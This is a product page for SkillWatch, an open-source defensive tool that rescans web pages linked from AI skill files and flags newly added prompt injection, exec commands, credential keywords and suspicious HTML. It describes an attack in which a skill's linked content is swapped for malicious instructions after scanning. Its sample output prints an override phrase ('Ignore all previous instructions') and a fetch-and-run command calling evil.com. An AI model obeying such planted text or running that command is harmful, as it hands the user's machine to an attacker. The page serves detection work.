SkillWatch
Watches the web pages your AI tools rely on and tells you when something changes. Catches some attacks, not all.
Python 3.10+ · 5 dependencies · Apache 2.0 · v0.3.0
The problem
AI tools pull in instructions from web pages. Security scanners check the tools when they are installed, but the web pages those tools point to can be changed afterwards. The scanners do not re-check.
In June 2026, researchers showed that a fake AI tool could pass every major scanner by keeping its code clean, then swapping the URL content from legitimate documentation to malicious instructions after distribution.
SkillWatch watches those URLs periodically (via cron or CI). It complements existing scanners; it does not replace them.
$ skillwatch add SKILL.md
Added 3 URL(s) from SKILL.md
$ skillwatch scan --preset docs
Scanning 3 URLs...
OK https://docs.example.com/setup
OK https://cdn.example.com/config.yaml
!! https://skills.example.com/install
prompt_injection (critical) Ignore all previous instructions
new_exec_command (critical) curl https://evil.com/x | bash
Scanned 3 URLs: 2 unchanged 1 changed (2 alerts)
13 pattern checks, zero infrastructure
Only newly added content triggers alerts, not things already on the page. These checks can be evaded. Review all alerts manually.
Critical
Prompt injection
32 patterns from the Agent Threat Rules project, covering 7 languages plus obfuscation tricks. Catches obvious phrasings like "ignore all previous instructions." Will not catch attacks phrased as polite requests, stories, or academic writing.
Critical
Exec commands
Flags new curl, wget, pip install, eval(), subprocess, powershell, and node -e commands in changed content.
Critical
Data URI embeds
Detects new iframes, embeds, and objects with data: URI payloads containing HTML or JavaScript.
Warning
Unicode lookalikes
Catches characters from other scripts (Cyrillic, Greek, Armenian) that look like Latin letters but are not. Uses the Unicode Consortium's official confusables database.
Warning
Credential keywords
Flags new references to api_key, token, password, .env, private_key, and similar terms that suggest credential harvesting.
Warning
Suspicious HTML
Flags new scripts that use eval, fetch, or access cookies. Also catches new iframes, meta refresh redirects, and hidden elements.
Quick start
pip install skillwatch
skillwatch add path/to/SKILL.md
skillwatch scan
skillwatch alerts
0 */4 * * * skillwatch scan --quiet --preset docs
skillwatch scan --output json | curl -d @- ntfy.sh/alerts
How SkillWatch fits alongside other tools
It watches a different layer than existing scanners. Use them together.
| Capability |
Snyk Agent Scan |
Cisco skill-scanner |
SkillWatch |
| Checks tool code and descriptions |
Yes |
Yes |
No |
| Watches external URLs for changes |
No |
No |
Yes |
| Tamper-evident, independently verifiable history |
No |
No |
Yes |
| Scheduled re-checking |
Enterprise only |
No |
Yes (cron/CI) |
| Prompt injection detection |
Yes (backend) |
Yes (YARA+LLM) |
Pattern-based (32 regex patterns; 75% recall, 50% vs evasive) |
| Free for individuals |
Yes |
Yes |
Yes |
| JSON output |
Yes |
No |
Yes |
| Works offline (no cloud service needed) |
No |
Yes |
Yes |
Why trust SkillWatch
SkillWatch is built to be the boring, honest option in a crowded field.
- It runs on your machine and sends nothing. Everything lives in a local SQLite file, and the only network requests it makes are to the URLs you ask it to watch. It never uploads your skills, configs, or results. Platform scanners often upload your skill code to their servers, which is a reasonable trade-off for their features but a different trust model.
- It tells you what it misses. It publishes its own measured detection and evasion rates and names the attacks that defeat it. A clean scan means "none of 13 checks matched", not "you're safe".
- It's independent and open. Apache 2.0, no paid tier, no telemetry, no platform to upsell. It complements scanners like Snyk Agent Scan, Cisco skill-scanner, Socket, and MCP-Scan rather than competing for your budget.
Free, open source, runs on your laptop
Five dependencies. Zero infrastructure. Nothing sent externally. Apache 2.0.
View on GitHub